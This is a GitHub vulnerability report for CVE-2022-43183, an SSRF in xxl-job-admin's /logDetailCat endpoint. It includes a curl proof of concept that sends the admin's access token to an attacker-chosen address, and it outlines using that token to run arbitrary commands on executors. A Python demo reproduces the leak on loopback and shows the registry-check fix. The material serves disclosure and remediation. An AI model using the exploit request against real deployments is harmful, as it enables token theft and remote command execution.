CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job
XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.
1. Vulnerability description
XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of XXL-JOB 2.3.1. It originates from /logDetailCat, which directly sends a log query request to the address given by executorAddress without checking whether the executorAddress parameter is a valid executor address. The query request carries the XXL-JOB-ACCESS-TOKEN header, so the XXL-JOB-ACCESS-TOKEN is leaked; the attacker then uses the XXL-JOB-ACCESS-TOKEN to call any executor, causing arbitrary command execution on the executor.
Calling the /logDetailCat interface only requires a low-privileged user of the platform.
2. Affected version
xxl-job-admin <= 2.3.1 (latest)
3. Proof of concept
1. Build an HTTP server locally that prints the headers of the requests it receives.
2. Create a normal user, normal, without any executor permissions.
3. Using the normal user, call the interface with the executorAddress input parameter set to the HTTP server address from step 1; the XXL-JOB-ACCESS-TOKEN of the target server is printed directly.
```shell
curl 'http://localhost:8080/xxl-job-admin/joblog/logDetailCat' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d' \
  -H 'Origin: http://localhost:8080' \
  -H 'Referer: http://localhost:8080/xxl-job-admin/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw 'executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729' \
  --compressed
```
4. Use the token to call the task trigger interface of the executor's RESTful API to execute arbitrary commands.
4. Recommendations
Do the same as in JobLogController.java's handling of the /joblog route, which enters the index method and checks whether the executorAddress parameter belongs to the executor's address list.
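As an added example (not xxl-job code and not from the reporter), the following Python models the flow of the report end to end: an attacker-controlled listener stands in for the HTTP server of PoC step 1, `log_cat()` stands in for the admin's /joblog/logDetailCat handler, and `is_registered()` is the address check the recommendation asks for. `ACCESS_TOKEN`, the registered executor list and every function name are constructed for this demo; the executor-side path "/log", the request body and the listener port are simplifications rather than the project's exact wire format, while the XXL-JOB-ACCESS-TOKEN header name follows the report.

```python
"""Added example: model of the CVE-2022-43183 SSRF and of the recommended check.

Everything here is constructed for the demo (hypothetical names, sample token,
sample registry); it is not xxl-job code. Runs offline on 127.0.0.1.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ACCESS_TOKEN = "constructed-sample-token"  # constructed, not a real token

# Lower-cased headers captured by the attacker-controlled listener (PoC step 1).
captured_headers = []

# Never route through proxies from the environment; this demo is loopback only.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class CaptureHandler(BaseHTTPRequestHandler):
    """Attacker's listener: record every header, answer with an empty log payload."""

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", "0")))
        captured_headers.append({k.lower(): v for k, v in self.headers.items()})
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b'{"code":200}')

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_listener():
    """Bind an ephemeral loopback port and serve from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), CaptureHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def normalize(addr):
    """Reduce 'host:port' or 'http://host:port/...' to a comparable (host, port)."""
    if "://" not in addr:
        addr = "http://" + addr
    u = urllib.parse.urlsplit(addr)
    return (u.hostname or "").lower(), u.port or 80


def is_registered(executor_address, registered):
    """The missing check: only an address the executor registered may be contacted."""
    return normalize(executor_address) in {normalize(r) for r in registered}


def log_cat(executor_address, registered, validate):
    """Model of logDetailCat: POST to <executorAddress>/log carrying the access token.

    validate=False reproduces the vulnerable behaviour (any address is contacted);
    validate=True applies the registry check before anything is sent.
    """
    if validate and not is_registered(executor_address, registered):
        raise ValueError("executorAddress is not a registered executor address")
    body = urllib.parse.urlencode({"logId": 0, "fromLineNum": 0}).encode()
    req = urllib.request.Request(executor_address.rstrip("/") + "/log", data=body)
    req.add_header("XXL-JOB-ACCESS-TOKEN", ACCESS_TOKEN)
    with _opener.open(req, timeout=5) as resp:
        return resp.status


def token_leaks(validate):
    """Run the PoC against a fresh listener; True if the token reached the attacker."""
    srv, attacker_url = start_listener()
    registered = ["http://192.168.1.10:9999/"]  # constructed registry entry
    captured_headers.clear()
    try:
        log_cat(attacker_url, registered, validate)
    except ValueError:
        pass
    finally:
        srv.shutdown()
        srv.server_close()
    return any(h.get("xxl-job-access-token") == ACCESS_TOKEN for h in captured_headers)


if __name__ == "__main__":
    print("vulnerable: token leaked =", token_leaks(validate=False))
    print("hardened:   token leaked =", token_leaks(validate=True))
```

The check compares normalized host and port rather than raw strings, so a registry entry stored as `host:port` still matches a request for `http://host:port/`, and an attacker cannot bypass it with a trailing path or a different scheme spelling. In xxl-job terms the `registered` list would come from the job group's registry rather than a literal.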